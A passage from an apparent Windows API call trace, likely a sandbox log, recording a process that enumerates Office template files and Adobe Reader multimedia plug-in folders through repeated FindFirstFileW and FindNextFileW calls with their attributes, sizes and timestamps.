ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x1bec38, dwReserved0=0x0, dwReserved1=0x0, cFileName="EquityReport.Dotx", cAlternateFileName="EQUITY~4.DOT")) returned 1 [0045.448] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b18ae00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e3d0870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3b18ae00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x45054, dwReserved0=0x0, dwReserved1=0x0, cFileName="EquityResume.Dotx", cAlternateFileName="EQD69A~1.DOT")) returned 1 [0045.448] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c49db00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e3d0870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c49db00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x1f0bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="EssentialLetter.dotx", cAlternateFileName="ESSENT~1.DOT")) returned 1 [0045.448] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c49db00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e3d0870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c49db00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x1ea93, dwReserved0=0x0, dwReserved1=0x0, cFileName="EssentialMergeLetter.dotx", cAlternateFileName="ESSENT~2.DOT")) returned 1 [0045.448] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c49db00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e3d0870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c49db00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0xbc195, dwReserved0=0x0, dwReserved1=0x0, cFileName="EssentialReport.dotx", cAlternateFileName="ESSENT~3.DOT")) returned 1 [0045.449] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c49db00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e3d0870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c49db00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x47014, dwReserved0=0x0, dwReserved1=0x0, cFileName="EssentialResume.dotx", cAlternateFileName="ESSENT~4.DOT")) returned 1 [0045.449] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b18ae00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e3f69d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3b18ae00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x11d28, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExecutiveLetter.dotx", cAlternateFileName="EXECUT~1.DOT")) returned 1 [0045.449] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b18ae00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e3f69d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3b18ae00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x12042, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExecutiveMergeLetter.dotx", cAlternateFileName="EXECUT~2.DOT")) returned 1 [0045.449] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b18ae00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e3f69d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3b18ae00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x3d49a, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExecutiveNewsletter.dotx", cAlternateFileName="EXECUT~3.DOT")) returned 1 [0045.449] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b18ae00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e3f69d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3b18ae00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0xcb42a, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExecutiveReport.dotx", cAlternateFileName="EXECUT~4.DOT")) returned 1 [0045.449] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b18ae00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e48ef50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3b18ae00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x1b00c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExecutiveResume.dotx", cAlternateFileName="EX9D69~1.DOT")) returned 1 [0045.450] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77b91500, ftCreationTime.dwHighDateTime=0x1c7c8e6, ftLastAccessTime.dwLowDateTime=0xfa5d8fb0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x77b91500, ftLastWriteTime.dwHighDateTime=0x1c7c8e6, nFileSizeHigh=0x0, nFileSizeLow=0x4a4d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExpenseReport.xltx", cAlternateFileName="EXPENS~1.XLT")) returned 1 [0045.450] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e3aa710, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e5274d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e5274d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FAX", cAlternateFileName="")) returned 1 [0048.910] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d87a080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d87a080, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.910] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d87a080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash.CAT", cAlternateFileName="")) returned 1 [0048.913] FindClose (in: hFindFile=0x4232298 | out: hFindFile=0x4232298) returned 1 [0048.914] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a40060 | out: hHeap=0xb10000) returned 1 [0048.914] FindNextFileW (in: hFindFile=0x4232318, lpFindFileData=0x352ee18 | out: lpFindFileData=0x352ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d853f20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d853f20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MPP_CZE", cAlternateFileName="")) returned 1 [0048.914] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\*", lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d853f20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d853f20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232298 [0048.915] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d853f20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d853f20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.915] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d82ddc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash.CZE", cAlternateFileName="")) returned 1 [0048.915] FindClose (in: hFindFile=0x4232298 | out: hFindFile=0x4232298) returned 1 [0048.915] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a30058 | out: hHeap=0xb10000) returned 1 [0048.915] FindNextFileW (in: hFindFile=0x4232318, lpFindFileData=0x352ee18 | out: lpFindFileData=0x352ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d853f20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d853f20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d853f20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MPP_HRV", cAlternateFileName="")) returned 1 [0048.915] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\*", lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d853f20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d853f20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d853f20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232298 [0048.915] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d853f20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d853f20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d853f20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.916] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d853f20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash.HRV", cAlternateFileName="")) returned 1 [0048.916] FindClose (in: hFindFile=0x4232298 | out: hFindFile=0x4232298) returned 1 [0048.916] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a30058 | out: hHeap=0xb10000) returned 1 [0048.916] FindNextFileW (in: hFindFile=0x4232318, lpFindFileData=0x352ee18 | out: lpFindFileData=0x352ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d82ddc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d82ddc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MPP_HUN", cAlternateFileName="")) returned 1 [0048.916] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\*", lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d82ddc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d82ddc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232298 [0048.916] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d82ddc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d82ddc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.916] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d82ddc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash.HUN", cAlternateFileName="")) returned 1 [0048.916] FindClose (in: hFindFile=0x4232298 | out: hFindFile=0x4232298) returned 1 [0048.917] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a30058 | out: hHeap=0xb10000) returned 1 [0048.917] FindNextFileW (in: hFindFile=0x4232318, lpFindFileData=0x352ee18 | out: lpFindFileData=0x352ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d82ddc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d82ddc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MPP_POL", cAlternateFileName="")) returned 1 [0048.917] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\*", lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d82ddc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d82ddc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232298 [0048.917] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d82ddc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d82ddc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.917] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d82ddc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash.POL", cAlternateFileName="")) returned 1 [0048.917] FindClose (in: hFindFile=0x4232298 | out: hFindFile=0x4232298) returned 1 [0048.917] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a30058 | out: hHeap=0xb10000) returned 1 [0048.917] FindNextFileW (in: hFindFile=0x4232318, lpFindFileData=0x352ee18 | out: lpFindFileData=0x352ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d82ddc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d82ddc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MPP_RUM", cAlternateFileName="")) returned 1 [0048.917] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\*", lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d82ddc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d82ddc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232298 [0048.918] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d82ddc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d82ddc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.918] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d807c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash.RUM", cAlternateFileName="")) returned 1 [0048.918] FindClose (in: hFindFile=0x4232298 | out: hFindFile=0x4232298) returned 1 [0048.918] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a30058 | out: hHeap=0xb10000) returned 1 [0048.918] FindNextFileW (in: hFindFile=0x4232318, lpFindFileData=0x352ee18 | out: lpFindFileData=0x352ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d807c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d807c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MPP_RUS", cAlternateFileName="")) returned 1 [0048.918] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\*", lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d807c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d807c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232298 [0048.918] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d807c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d807c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.918] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d807c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash.RUS", cAlternateFileName="")) returned 1 [0048.919] FindClose (in: hFindFile=0x4232298 | out: hFindFile=0x4232298) returned 1 [0048.919] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a30058 | out: hHeap=0xb10000) returned 1 [0048.919] FindNextFileW (in: hFindFile=0x4232318, lpFindFileData=0x352ee18 | out: lpFindFileData=0x352ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d807c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d807c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MPP_SKY", cAlternateFileName="")) returned 1 [0048.919] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\*", lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d807c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d807c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232298 [0048.919] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d807c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d807c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.919] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d807c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash.SKY", cAlternateFileName="")) returned 1 [0048.919] FindClose (in: hFindFile=0x4232298 | out: hFindFile=0x4232298) returned 1 [0048.919] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a30058 | out: hHeap=0xb10000) returned 1 [0048.919] FindNextFileW (in: hFindFile=0x4232318, lpFindFileData=0x352ee18 | out: lpFindFileData=0x352ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d807c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d807c60, 